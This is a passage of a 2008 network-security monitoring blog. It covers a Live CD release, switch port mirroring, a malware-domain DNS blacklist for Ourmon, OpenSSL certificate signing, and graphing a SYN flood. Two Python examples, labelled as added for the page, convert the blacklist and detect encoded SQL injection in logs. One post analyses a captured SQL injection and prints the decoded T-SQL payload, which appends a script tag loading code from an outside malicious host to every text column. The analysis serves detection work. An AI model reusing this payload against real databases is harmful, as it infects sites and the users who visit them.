HeX 2.0 - The Bonobo Released

October 7th, 2008

Finally, after months of effort, the HeX development team has released the HeX 2.0 Live CD, codename The Bonobo. This new release includes various application updates and additional features, which you can check out at the raWPacket website.

We have already synced all the ISO images to various mirror sites, so you can get it as soon as possible. Other than the 3 mirror sites on the HeX 2.0 Release page, you can also download the Live CD from the additional mirror sites below:

Malaysia: (thanks to Zamri)
http://archive.mmu.edu.my/hex/hex-i386-2.0.iso
http://archive.mmu.edu.my/hex/hex-i386-2.0.iso.md5
http://archive.mmu.edu.my/hex/hex-i386-2.0.iso.sha256

US: (thanks to enhanced)
https://secure.redsphereglobal.com/data/tools/security/live/HeX/hex-i386-2.0.iso
https://secure.redsphereglobal.com/data/tools/security/live/HeX/hex-i386-2.0.iso.md5
https://secure.redsphereglobal.com/data/tools/security/live/HeX/hex-i386-2.0.iso.sha256

Also, don't forget our 2 new, very own HeX wallpapers, which can be downloaded here!

Join our mailing list http://groups.google.com/group/HeX-liveCD or IRC #rawpacket on Freenode if you wish to ask questions, contribute ideas, and have fun with HeX users.

HeX 2.0R Preview

October 6th, 2008

We are uploading the HeX 2.0 Release image to the mirror sites now; it is going to be released in another few hours. I won't reveal much information here for the time being; check out the preview images.

HeX 2.0 preview

By the way, if you have not updated your WordPress installation to version 2.6.2, you should do it now. Hacking attempts are in the wild. This is the screenshot I took before I updated it weeks ago.

HeX 2.0 preview

Set 3com SuperStack 3 Switch 4500 Port Mirroring (SPAN)

May 24th, 2008

I do not intend to promote any products in this blog. This post is for me to record the setup, which is pretty simple to do in a console or remote session.

<4500> system-view
[4500] interface Ethernet 1/0/1
[4500-Ethernet1/0/1] mirroring-port ?
  both      Mirror the inbound and outbound packets of the interface
  inbound   Mirror the inbound packets of the interface
  outbound  Mirror the outbound packets of the interface
[4500-Ethernet1/0/1] mirroring-port both
[4500-Ethernet1/0/1] quit
[4500] interface GigabitEthernet 1/0/27
[4500-GigabitEthernet1/0/27] monitor-port
[4500-GigabitEthernet1/0/27] quit
[4500] display mirror
 Monitor-port:
   GigabitEthernet1/0/27
 Mirroring-port:
   Ethernet1/0/1              both

Both inbound and outbound traffic of Ethernet 1/0/1 will be mirrored to GigabitEthernet 1/0/27, and you can connect your monitoring server to this monitor port to receive the traffic.

That’s all for today.

Ourmon DNS Blacklist

April 26th, 2008

There is a new module in Ourmon, Topn DNS, that shows DNS traffic statistics. It comes with a DNS blacklist feature that needs to be configured. What I am going to show here is how to configure it (which is quite easy) and how to automate the update with simple Shell and Perl scripting.

First of all, this is the how to for DNS blacklist configuration:

The dns_include file config line allows a DNS name based blacklist to be configured into the ourmon probe. Any number of files may be given. The format of individual entries in the DNS blacklist is as follows:

lsass.exploited.org A

One entry should be given per line.

DNS query responses are unwrapped and if the question is found to match the DNS name in the blacklist, an ourmon event log message is generated.

That means we need to create a blacklist file in the format above, containing the list of blacklisted domains.

There is a project called DNS-BH that creates and maintains a list of domains known to be used to propagate malware and spyware. So, with the free malware domains list, we can create a list and include it in the DNS blacklist.

I have created 2 scripts: 1 Perl script (domain-filter.pl) to grab the domains from the malware domains list and write them to a new file in the format that Ourmon accepts, for example:

From:
guti.my        unknown   guti.my/ourmon-dns-blacklist      2008apr
to:
guti.my A

and 1 Shell script (getbldns.sh) to process the update, so that I can set it as a cron job.
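An added converter, written for this page and not the author's domain-filter.pl, that does the same reformatting in Python: it reads lines in the DNS-BH layout shown above and emits Ourmon dns_include entries ("domain A"), skipping comment lines, malformed names and duplicates. The sample input below is constructed for the example, not taken from DNS-BH.

```python
import re
from typing import Iterable, List

# Constructed sample in the DNS-BH layout: domain, description, reference, date.
# These lines are made up for the example; they are not real DNS-BH entries.
SAMPLE_DNSBH = """\
## Malware Domain Blocklist (constructed sample)
guti.my        unknown   guti.my/ourmon-dns-blacklist      2008apr
Example.Bad.test   trojan   example.org/report   2008apr
bad_host!.test   malformed  -   2008apr
guti.my        unknown   duplicate-entry   2008apr

other.example.test.   exploit   -   2008apr
"""

# Hostname: labels of letters, digits and hyphens joined by dots, no leading/trailing hyphen.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)+{_LABEL}$")


def dnsbh_to_ourmon(lines: Iterable[str]) -> List[str]:
    """Turn DNS-BH lines into Ourmon dns_include entries ('<domain> A', one per line).

    Comment and blank lines are skipped, only the first column is used, names are
    lower-cased, a trailing dot is dropped, names that are not valid hostnames are
    rejected, and duplicates are removed while keeping first-seen order.
    """
    seen = set()
    out = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        domain = line.split()[0].lower().rstrip(".")
        if not _HOSTNAME_RE.match(domain) or domain in seen:
            continue
        seen.add(domain)
        out.append(f"{domain} A")
    return out


if __name__ == "__main__":
    # Writing this output to the file named in dns_include is what the cron job would do.
    for entry in dnsbh_to_ourmon(SAMPLE_DNSBH.splitlines()):
        print(entry)
```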

For those who are interested in trying it out, you may download it at http://www.gutizz.com/scripts/ourmon-dns-blacklist.bz2.
md5sum: http://www.gutizz.com/scripts/ourmon-dns-blacklist.bz2.md5
There is a Readme file included in the package as well. You need to edit the path of dns_include, and the path in the getbldns.sh shell script, if your installation is in a different directory.

This is a sample of the event log after the blacklist has been configured; you need to check why there were DNS requests to malware domains from these servers. (Click to enlarge the image.)
DNS Blacklist Event Log

There are 2 other blacklist features in Ourmon as well, the IRC blacklist and the IP blacklist. The Ourmon team has written the IRC blacklist script and put it in Ourmon src/scripts/. I am still working on the IP blacklist, which will fetch the blacklisted IPs from the Harimau watchlist; the main problem is netblock support in the Ourmon IP blacklist, so I will consider removing the netblock addresses.

If you are concerned about CPU and memory usage, here is the resource usage of Ourmon with 20290 domains in the DNS blacklist, the list of IPs from the Emerging Threats botcc rules loaded in the IRC blacklist, and over 10k packets/s at peak.

  PID USERNAME  THR PRI NICE   SIZE    RES STATE  C   TIME   WCPU COMMAND
59799   root          1   -58    0  48552K 28348K  bpf    4   3:44   2.49%  ourmon

If you have any other recommendations on the DNS blacklist, please let me know.

Encoded SQL Injection

April 24th, 2008

There is nothing new in reading security advisories about SQL injection vulnerabilities found in certain products or applications. Most of the SQL injections I have dealt with are plain SQL code injections, which allow me to easily search for signs of a SQL injection attack in the HTTP log, unless the bad guys are using the POST method inside a form or something else.

Today I discovered a rare encoded SQL injection in one website's HTTP log, targeting a MS SQL database. The bad guys used the HTTP GET method, with encoded code inside the SQL injection. It was not difficult to detect due to its long URL; below is the code.

script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...

This is the decoded version of the HEX code in the CAST function:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

It seems that there is a loop in the HEX code that appends the js script to each field after its first 30 characters, regardless of whether the field holds more than 30 characters: the SQL code is injected the first time, and another copy after the 30th character. (The 30 comes from MS SQL's convert(varchar, ...) without a length, which defaults to 30 characters.)

With encoded SQL code, the injection can easily bypass IDS and prevention rules, unless you have set the IDS to alert when a URL passing through it exceeds a certain number of characters, or you inspect the HTTP log from time to time.
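An added example (not from the post) of the HTTP log check described here, in Python: it percent-decodes each request line, flags the DECLARE ... CAST(0x... AS NVARCHAR) pattern, and decodes the hex literal (UTF-16LE for NVARCHAR, single-byte for VARCHAR) so the injected T-SQL can be read in the alert. The sample request line is constructed, and LONG_URL_THRESHOLD is an assumed value.

```python
import re
from typing import Dict, Optional
from urllib.parse import unquote

# Shape of the encoded injection seen in the post: a DECLARE/SET of an NVARCHAR
# variable loaded from CAST(0x<hex> AS NVARCHAR(...)).
_CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9a-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)
_DECLARE_RE = re.compile(r"DECLARE\s+@\w+\s+N?VARCHAR", re.IGNORECASE)

LONG_URL_THRESHOLD = 1024  # assumed value; tune to the site's normal request sizes


def decode_cast_hex(hex_payload: str, sql_type: str) -> str:
    """Decode the 0x... literal: NVARCHAR is UCS-2/UTF-16LE, VARCHAR is single-byte."""
    raw = bytes.fromhex(hex_payload)
    if sql_type.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def inspect_request(request_line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a request line carrying a hex-encoded T-SQL batch, else None.

    The URL is percent-decoded first so that '%20' spacing cannot hide the keywords.
    """
    decoded_url = unquote(request_line)
    cast = _CAST_HEX_RE.search(decoded_url)
    if not cast or not _DECLARE_RE.search(decoded_url):
        return None
    return {
        "reason": "hex-encoded T-SQL via CAST(0x...)",
        "url_length": str(len(request_line)),
        "long_url": str(len(request_line) > LONG_URL_THRESHOLD),
        "decoded_sql": decode_cast_hex(cast.group(1), cast.group(2)),
    }


def constructed_sample() -> str:
    """A constructed request line in the shape of the one in the post (not the real payload)."""
    inner = "DECLARE @T varchar(255)"  # short stand-in for the encoded batch
    hexpart = inner.encode("utf-16-le").hex()
    return ("GET /script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
            + hexpart + "%20AS%20NVARCHAR(4000)) HTTP/1.1")


if __name__ == "__main__":
    print(inspect_request(constructed_sample()))
```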

The js script redirects users to another page, 1.htm, which then tries to download exploits targeting outdated Real Player and a few MS remote code execution vulnerabilities such as MS06-014, MS07-004, MS07-018 and a few others. So, make sure your Windows and other third-party applications are always updated to the latest version or have the latest patches applied.

Updates:
It seems that this domain has been listed on malwaredomains.com since 17th April.

OpenSSL creates CA serial file

April 12th, 2008

I encountered the error below when I followed the Sguil OPENSSL.README to generate a certificate with a local CA for my Sguil 0.7.0 installation on FreeBSD 7.0 Release.

[root@nsm]# openssl x509 -req -in sguild.req -CA CA.pem -CAkey privkey.pem -CAserial file.sr1 -out sguild.pem
Signature ok
subject=/C=MY/ST=PG/O=Sguil/OU=Security/CN=servername
Getting CA Private Key
Enter pass phrase for privkey.pem:
file.sr1: No such file or directory
82464:error:02001002:system library:fopen:No such file or directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:352:fopen('file.sr1','r')
82464:error:20074002:BIO routines:FILE_CTRL:system lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:354:

From the error message, it is obvious that I did not have file.sr1. Since this was the first time I used the CA to sign a certificate, I needed to create a serial file containing a serial number. So I ran with -CAcreateserial as below:

[root@nsm]# openssl x509 -req -in sguild.req -CA CA.pem -CAkey privkey.pem -CAcreateserial -out sguild.pem

This created a new file (CA.srl) containing a serial number. The next time, I have to use the -CAserial option when I create a new certificate, and specify the path to this file. The serial number is incremented each time a new certificate is created.

Grace - XY plotting tool

April 5th, 2008

I recently collected the packets of a DDoS attack on one machine. It is just a pure SYN attack to destination port 80, with over 5000 packets from different IPs in 1 second. I tried to create a graph of these packets using Grace, a WYSIWYG 2D plotting tool for the X Window System and M*tif. Grace runs on practically any version of Unix-like OS; it has also been successfully ported to VMS, OS/2, and Win9*/NT/2000/XP.

First, I used the Argus client ra to show unidirectional RMON stats with only the source port and destination port selected, piped it to awk to make the data readable by Grace, and then converted the number for the destination port. For example, X=0, Y=2224 (source port), then X=1, Y=80 (destination port):

[guti@nsm /]# ra -nr syn.argus -M rmon -s sport | awk '{ print 0,$1 }' | sed -e 's/^0 80$/1 80/' > syn.dat

The output of syn.dat looks like this:

[guti@nsm /]# head -n 6 syn.dat
0 2224
1 80
0 2236
1 80
0 2242
1 80

Then use Grace to plot it.

[guti@nsm /]# xmgrace6 syn.dat &

This is the graph of 23 seconds of DDoS, from source port to destination port.
DDOS Ports Grace Graph

If I use AfterGlow to show the connections from source port to destination port, the graph looks like this.
DDOS Ports Afterglow Graph

This is the graph after I converted the source and destination IPs to decimal, for example, from 192.168.1.123 to 3232235899.
DDOS IP Grace Graph

1-second source port to destination port graph, approximately 5000 SYN per second:
DDOS Ports Grace 1 Second Graph

From the port graph, I guess the DDoS was launched from 1 host with spoofed source IPs and a large bandwidth pipe. What do you think?

Ourmon and Snort 2.8.1 Released

April 4th, 2008

I noticed Ourmon 2.8.1 was quietly released on 21 March 2008. This bug-fix release fixes the bugs I reported previously, and my name is in the release notes. The IP blacklist config now takes 3 arguments; this helps when you have multiple blacklists, so you can immediately tell which blacklist caused the message, but I have yet to test this feature.
For example, in ourmon.conf:

blist_include "irc"  /home/mrourmon/etc/ipblacklist.txt

Snort, an open source network intrusion prevention and detection system, has released version 2.8.1. I got a 404 error while trying to download Snort 2.8.0.2 yesterday and noticed the file was not there anymore. Within a few minutes, the Snort download page was refreshed with the new v2.8.1 package. Coincidentally, the release version number is the same as Ourmon's latest bug-fix release. In v2.8.1, one of the new additions is the ability to read multiple pcaps from the command line, which I have usually done with Argus. Here is a sample:

[root@nsm /]# snort -dv -r irc1.pcap -r irc2.pcap | less
Running in packet dump mode

        --== Initializing Snort ==--
Initializing Output Plugins!
Verifying Preprocessor Configurations!
TCPDUMP file reading mode.
Reading network traffic from "irc1.pcap" file.
snaplen = 65535

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.8.1 (Build 28)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2008 Sourcefire Inc., et al.
           Using PCRE version: 7.6 2008-01-28

Not Using PCAP_FRAMES
07/11-08:00:32.312306 192.168.128.86:6667 -> 10.1.2.177:32793
TCP TTL:40 TOS:0x0 ID:51682 IpLen:20 DgmLen:91 DF
***AP*** Seq: 0xB368B2EB  Ack: 0xE79F2A5  Win: 0xB50  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2184210158 757152
3A 62 6D 77 30 37 21 34 76 71 74 71 74 34 40 38  :bmw07!4vqtqt4@8
32 2E 37 39 2E 38 37 2E 37 39 20 4A 4F 49 4E 20  2.79.87.79 JOIN
23 61 6C 62 61 0D 0A                                               #alba..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+